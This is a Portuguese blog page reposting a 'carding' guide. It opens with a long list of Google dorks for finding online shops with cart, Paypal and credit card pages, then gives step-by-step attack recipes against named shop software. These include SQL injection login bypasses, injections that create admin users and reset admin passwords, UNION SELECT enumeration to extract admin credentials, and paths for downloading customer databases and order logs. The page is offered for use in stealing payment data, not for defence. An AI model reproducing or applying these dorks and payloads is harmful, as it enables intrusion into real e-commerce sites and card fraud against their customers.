Inicio Uncategories Google Dorks List

Google Dorks List

10:27
  1. Google Dorks List
  2.  
  3.  
  4. inurl:".php?cat="+intext:"Paypal"+site:UK
  5. inurl:".php?cat="+intext:"/Buy Now/"+site:.net
  6. inurl:".php?cid="+intext:"online+betting"
  7.  
  8.  
  9.  
  10. inurl:".php?id=" intext:"View cart"
  11. inurl:".php?id=" intext:"Buy Now"
  12. inurl:".php?id=" intext:"add to cart"
  13. inurl:".php?id=" intext:"shopping"
  14. inurl:".php?id=" intext:"boutique"
  15. inurl:".php?id=" intext:"/store/"
  16. inurl:".php?id=" intext:"/shop/"
  17. inurl:".php?id=" intext:"toys"
  18.  
  19. inurl:".php?cid="
  20. inurl:".php?cid=" intext:"shopping"
  21. inurl:".php?cid=" intext:"add to cart"
  22. inurl:".php?cid=" intext:"Buy Now"
  23. inurl:".php?cid=" intext:"View cart"
  24. inurl:".php?cid=" intext:"boutique"
  25. inurl:".php?cid=" intext:"/store/"
  26. inurl:".php?cid=" intext:"/shop/"
  27. inurl:".php?cid=" intext:"Toys"
  28.  
  29. inurl:".php?cat="
  30. inurl:".php?cat=" intext:"shopping"
  31. inurl:".php?cat=" intext:"add to cart"
  32. inurl:".php?cat=" intext:"Buy Now"
  33. inurl:".php?cat=" intext:"View cart"
  34. inurl:".php?cat=" intext:"boutique"
  35. inurl:".php?cat=" intext:"/store/"
  36. inurl:".php?cat=" intext:"/shop/"
  37. inurl:".php?cat=" intext:"Toys"
  38.  
  39. inurl:".php?catid="
  40. inurl:".php?catid=" intext:"View cart"
  41. inurl:".php?catid=" intext:"Buy Now"
  42. inurl:".php?catid=" intext:"add to cart"
  43. inurl:".php?catid=" intext:"shopping"
  44. inurl:".php?catid=" intext:"boutique"
  45. inurl:".php?catid=" intext:"/store/"
  46. inurl:".php?catid=" intext:"/shop/"
  47. inurl:".php?catid=" intext:"Toys"
  48.  
  49. inurl:".php?categoryid="
  50. inurl:".php?categoryid=" intext:"View cart"
  51. inurl:".php?categoryid=" intext:"Buy Now"
  52. inurl:".php?categoryid=" intext:"add to cart"
  53. inurl:".php?categoryid=" intext:"shopping"
  54. inurl:".php?categoryid=" intext:"boutique"
  55. inurl:".php?categoryid=" intext:"/store/"
  56. inurl:".php?categoryid=" intext:"/shop/"
  57. inurl:".php?categoryid=" intext:"Toys"
  58.  
  59. inurl:".php?pid="
  60. inurl:".php?pid=" intext:"shopping"
  61. inurl:".php?pid=" intext:"add to cart"
  62. inurl:".php?pid=" intext:"Buy Now"
  63. inurl:".php?pid=" intext:"View cart"
  64. inurl:".php?pid=" intext:"boutique"
  65. inurl:".php?pid=" intext:"/store/"
  66. inurl:".php?pid=" intext:"/shop/"
  67. inurl:".php?pid=" intext:"toys"
  68.  
  69. inurl:".php?prodid=
  70. inurl:".php?prodid=" intext:"shopping"
  71. inurl:".php?prodid=" intext:"add to cart"
  72. inurl:".php?prodid=" intext:"Buy Now"
  73. inurl:".php?prodid=" intext:"View cart"
  74. inurl:".php?prodid=" intext:"boutique"
  75. inurl:".php?prodid=" intext:"/store/"
  76. inurl:".php?prodid=" intext:"/shop/"
  77. inurl:".php?prodid=" intext:"toys"
  78.  
  79. inurl:".php?productid='
  80. inurl:".php?productid=" intext:"shopping"
  81. inurl:".php?productid=" intext:"add to cart"
  82. inurl:".php?productid=" intext:"Buy Now"
  83. inurl:".php?productid=" intext:"View cart"
  84. inurl:".php?productid=" intext:"boutique"
  85. inurl:".php?productid=" intext:"/store/"
  86. inurl:".php?productid=" intext:"/shop/"
  87. inurl:".php?productid=" intext:"Toys"
  88.  
  89. inurl:".php?product="
  90. inurl:".php?product=" intext:"shopping"
  91. inurl:".php?product=" intext:"add to cart"
  92. inurl:".php?product=" intext:"Buy Now"
  93. inurl:".php?product=" intext:"View cart"
  94. inurl:".php?product=" intext:"boutique"
  95. inurl:".php?product=" intext:"/store/"
  96. inurl:".php?product=" intext:"/shop/"
  97. inurl:".php?product=" intext:"toys"
  98. inurl:".php?product=" intext:"DVD"
  99.  
  100. inurl:".php?products="
  101. inurl:".php?products=" intext:"shopping"
  102. inurl:".php?products=" intext:"add to cart"
  103. inurl:".php?products=" intext:"Buy Now"
  104. inurl:".php?products=" intext:"View cart"
  105. inurl:".php?products=" intext:"boutique"
  106. inurl:".php?products=" intext:"/store/"
  107. inurl:".php?products=" intext:"/shop/"
  108. inurl:".php?products=" intext:"toys"
  109. inurl:".php?products=" intext:"DVD"
  110.  
  111. inurl:".php?proid="
  112. inurl:".php?proid=" intext:"shopping"
  113. inurl:".php?proid=" intext:"add to cart"
  114. inurl:".php?proid=" intext:"Buy Now"
  115. inurl:".php?proid=" intext:"View cart"
  116. inurl:".php?proid=" intext:"boutique"
  117. inurl:".php?proid=" intext:"/store/"
  118. inurl:".php?proid=" intext:"/shop/"
  119. inurl:".php?proid=" intext:"toys"
  120.  
  121. inurl:".php?shopid="
  122. inurl:".php?shopid=" intext:"shopping"
  123. inurl:".php?shopid=" intext:"add to cart"
  124. inurl:".php?shopid=" intext:"Buy Now"
  125. inurl:".php?shopid=" intext:"View cart"
  126. inurl:".php?shopid=" intext:"boutique"
  127. inurl:".php?shopid=" intext:"/store/"
  128. inurl:".php?shopid=" intext:"/shop/"
  129. inurl:".php?shopid=" intext:"Toys"
  130.  
  131. inurl:".php?itemid="
  132. inurl:".php?itemid=" intext:"shopping"
  133. inurl:".php?itemid=" intext:"add to cart"
  134. inurl:".php?itemid=" intext:"Buy Now"
  135. inurl:".php?itemid=" intext:"View cart"
  136. inurl:".php?itemid=" intext:"boutique"
  137. inurl:".php?itemid=" intext:"/shop/"
  138. inurl:".php?itemid=" intext:"/store/"
  139. inurl:".php?itemid=" intext:"Toys"
  140.  
  141. inurl:".php?orderid="
  142. inurl:".php?orderid=" intext:"shopping"
  143. inurl:".php?orderid=" intext:"add to cart"
  144. inurl:".php?orderid=" intext:"Buy Now"
  145. inurl:".php?orderid=" intext:"View cart"
  146. inurl:".php?orderid=" intext:"boutique"
  147. inurl:".php?orderid=" intext:"/shop/"
  148. inurl:".php?orderid=" intext:"/store/"
  149. inurl:".php?orderid=" intext:"Toys"
  150.  
  151.  
  152. inurl:".php?catalogId="
  153. inurl:".php?catalogId=" intext:"shopping"
  154. inurl:".php?catalogId=" intext:"add to cart"
  155. inurl:".php?catalogId=" intext:"Buy Now"
  156. inurl:".php?catalogId=" intext:"View cart"
  157. inurl:".php?catalogId=" intext:"boutique"
  158. inurl:".php?catalogId=" intext:"/shop/"
  159. inurl:".php?catalogId=" intext:"/store/"
  160. inurl:".php?catalogId=" intext:"Toys"
  161.  
  162. inurl:".php?aid="
  163. inurl:".php?aid=" intext:"shopping"
  164. inurl:".php?aid=" intext:"add to cart"
  165. inurl:".php?aid=" intext:"Buy Now"
  166. inurl:".php?aid=" intext:"View cart"
  167. inurl:".php?aid=" intext:"boutique"
  168. inurl:".php?aid=" intext:"/shop/"
  169. inurl:".php?aid=" intext:"/store/"
  170. inurl:".php?aid=" intext:"toys"
  171.  
  172. inurl:".php?artid="
  173. inurl:".php?artid=" intext:"shopping"
  174. inurl:".php?artid=" intext:"add to cart"
  175. inurl:".php?artid=" intext:"Buy Now"
  176. inurl:".php?artid=" intext:"View cart"
  177. inurl:".php?artid=" intext:"boutique"
  178. inurl:".php?artid=" intext:"/shop/"
  179. inurl:".php?artid=" intext:"/store/"
  180. inurl:".php?artid=" intext:"toys"
  181.  
  182.  
  183. inurl:".php?articleid="
  184. inurl:".php?articleid=" intext:"shopping"
  185. inurl:".php?articleid=" intext:"add to cart"
  186. inurl:".php?articleid=" intext:"Buy Now"
  187. inurl:".php?articleid=" intext:"View cart"
  188. inurl:".php?articleid=" intext:"boutique"
  189. inurl:".php?articleid=" intext:"/shop/"
  190. inurl:".php?articleid=" intext:"/store/"
  191. inurl:".php?articleid=" intext:"toys"
  192.  
  193. ##############################################
  194. Dork list +How to Do Carding- 2015 - March 20#
  195. ##############################################
  196.  
  197. DORK CARDING 2015 AND HOW TO EXPLOIT
  198. ============Legion7sign============
  199.  
  200. user.php?id=
  201. user.bmlid=
  202. user.jsp?id=
  203. user.cfm?id=
  204. user.htlm?id=
  205. user.php?CategoryID=
  206. user.php?shopID=
  207. user.php?shippingID=
  208. user.php?infoID=
  209. user.php?custID=
  210. user.php?webID=
  211. user.php?cad=
  212.  
  213. How to exploit :
  214.  
  215. [-]Tool
  216. -gr3enox exploit scanner
  217.  
  218.  
  219. Example dork :
  220. paypal : user.php?id=
  221. CreditCard : user.php?pay=
  222.  
  223. Paypal :
  224. user.php?id= < you can edit this dork :
  225. customer.php?id=
  226.  
  227. if you want to exploit just change the customer < & id < only
  228. example : payment.php?aspx=
  229.           payment.php?jsp=
  230.  
  231. Credit Card :
  232. user.php?pay= < example dork cc you can change :
  233. customer.php?pay=
  234.  
  235. wanna try ?
  236.  
  237. just change customer < & pay <
  238.  
  239. example :
  240.  
  241. amex.php?CategoryID=
  242.  
  243. exploit sample :
  244. u.php?jsp=
  245. u.php?aspx=
  246. u.php?id=
  247. u.php?pay=
  248. u.php?cat=
  249. u.php?search=
  250. u.php?urlid=
  251. u.php?car=
  252.  
  253. *PS : " You can add site like this : u.php?car=+site:uk
  254.  
  255. =======IT'S AT YOUR OWN RISK=======
  256.  
  257.  
  258. ##############################
  259. Full Explanation For Carding##
  260. ##############################
  261.  
  262.  
  263. ###############
  264. Aluf Hack Team#
  265. ###############
  266.  
  267. 1:
  268. google dork :--> inurl:"/cart.php?m="
  269. target looks lile :--> ...cart.php?m=view
  270. exploit: chage cart.php?m=view to /admin
  271. target whit exploit :-->
  272. Usename : 'or"="
  273. Password : 'or"=
  274.  
  275. 2:
  276. google dork :--> allinurlroddetail.asp?prod=
  277. target looks like :--> xxxxx.org (big leters and numbers )
  278. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
  279. target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
  280.  
  281. 3:
  282. google dork :--> allinurl: /cgi-local/shopper.cgi
  283. target looks like :--> ....dd=action&key=
  284. exploit :--> ...&template=order.log
  285. target whit exploit :--> .....late=order.log
  286.  
  287. 4:
  288. google dork :--> allinurl: Lobby.asp
  289. target looks like :--> www.xxxxx.com/mall/lobby.asp
  290. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
  291. target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
  292.  
  293. 5:
  294. google dork :--> allinurl:/vpasp/shopsearch.asp
  295. when u find a target put this in search box
  296. Keyword=&category=5); insert into tbluser (fldusername) values
  297. ('')--&SubCategory=&hide=&action.x=46&action.y=6
  298. Keyword=&category=5); update tbluser set fldpassword='' where
  299. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  300. Keyword=&category=3); update tbluser set fldaccess='1' where
  301. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  302. Jangan lupa untuk mengganti dan nya terserah kamu.
  303. Untuk mengganti password admin, masukkan keyword berikut :
  304. Keyword=&category=5); update tbluser set fldpassword='' where
  305. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
  306.  
  307. login page:
  308.  
  309. 6:
  310. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
  311. target looks like :--> ....asp?cat=xxxxxx
  312. exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
  313. if this is not working try this ends
  314. %20'a%25'--
  315. %20'b%25'--
  316. %20'c%25'--
  317. after finding user and pass go to login page:
  318.  
  319. 7:
  320. google dork :--> allinurl:/shopadmin.asp
  321. target looks like :--> www.xxxxxx.com/shopadmin.asp
  322. exploit:
  323. user : 'or'1
  324. pass : 'or'1
  325.  
  326. 8:
  327. google.com :--> allinurl:/store/index.cgi/page=
  328. target looks like :--> ....shortblue.htm
  329. exploit :--> ../admin/files/order.log
  330. target whit exploit :--> .c....iles/order.log
  331.  
  332. 9:
  333. google.com:--> allinurl:/metacart/
  334. target looks like :--> www.xxxxxx.com/metacart/about.asp
  335. exploit :--> /database/metacart.mdb
  336. target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
  337.  
  338. 10:
  339. google.com:--> allinurl:/DCShop/
  340. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
  341. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
  342. target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
  343.  
  344. 11:
  345. google.com:--> allinurl:/shop/category.asp/catid=
  346. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
  347. exploit :--> /admin/dbsetup.asp
  348. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
  349. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  350. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
  351. in db look for access to find pass and user of shop admins.
  352.  
  353. 12:
  354. google.com:--> allinurl:/commercesql/
  355. target looks like :--> www.xxxxx.com/commercesql/xxxxx
  356. exploit :--> cgi-bin/commercesql/index.cgi?page=
  357. target whit exploit admin config :--> ..../adminconf.pl
  358. target whit exploit admin manager :--> ....in/manager.cgi
  359. target whit exploit order.log :--> ....iles/order.log
  360.  
  361. 13:
  362. google.com:--> allinurl:/eshop/
  363. target looks like :--> www.xxxxx.com/xxxxx/eshop
  364. exploit :-->/cg-bin/eshop/database/order.mdb
  365. target whit exploit :--> ....base/order.mdb
  366. after dl the db look at access for user and password
  367.  
  368. 14:
  369. 1/ search google: allinurl:"shopdisplayproducts.asp?id=
  370. --->=5
  371.  
  372. 2/ find error by adding '
  373. --->=5'
  374.  
  375. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
  376.  
  377. -If you don't see error then change id to cat
  378.  
  379. --->=5'
  380.  
  381. 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
  382.  
  383. --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
  384.  
  385. --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of column in the two selected tables or queries of a union queries do not match......
  386.  
  387. 4/ add 2,3,4,5,6.......until you see a nice table
  388.  
  389. add 2
  390. ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
  391. then 3
  392. ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
  393. then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
  394.  
  395. ...5,6,7,8,9.... untill you see a table. (exp:...47)
  396.  
  397. ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
  398. ---->see a table.
  399.  
  400. 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
  401.  
  402. --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
  403.  
  404. 6/ Find link admin to login:
  405. try this first:
  406. or:
  407.  
  408. Didn't work? then u have to find yourself:
  409.  
  410. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  411.  
  412. --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  413.  
  414. you'll see something like: ( lot of them)
  415.  
  416. shopaddmoretocart.asp
  417. shopcheckout.asp
  418. shopdisplaycategories.asp
  419. ..............
  420.  
  421. then guess admin link by adding the above data untill you find admin links
  422.  
  423. 15:
  424. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
  425. the most important thing here is xDatabase
  426. xDatabase: shopping140
  427. ok now the URL will be like this:
  428. ****://.victim.com/shop/shopping140.mdb
  429. if you didn't download the Database..
  430. Try this while there is dblocation.
  431. xDblocation
  432. resx
  433.  
  434. the url will be:
  435. ****://.victim.com/shop/resx/shopping140.mdb
  436. If u see the error message you have to try this :
  437. ****://.victim.com/shop/shopping500.mdb
  438.  
  439. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
  440.  
  441. inside you should be able to find *** information.
  442. and you should even be able to find the admin username and password for the website.
  443.  
  444. the admin login page is usually located here
  445. ****://.victim.com/shop/shopadmin.asp
  446.  
  447. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
  448.  
  449. Username: admin
  450. password: admin
  451. OR
  452. Username: vpasp
  453. password: vpasp
  454.  
  455. Hope you enjoy this !!

1 comentários:

Clique aqui para comentários
Brother Printer Support
16 de outubro de 2019 às 21:30 ×

A printer is a human-made device; it will meet some glitches in future, just dial the toll-free number of HP printer support for customers 24/7.

HP Printer support | Epson Printer Support

Selamat Brother Printer Support dapat PERTAMAX...! Silahkan antri di pom terdekat heheheh...
Balas
avatar
admin
Obrigado pelo seu comentário
Assinar: Postar comentários (Atom)

Postagens Relacionadas

Related Posts Plugin for WordPress, Blogger...

Programador GB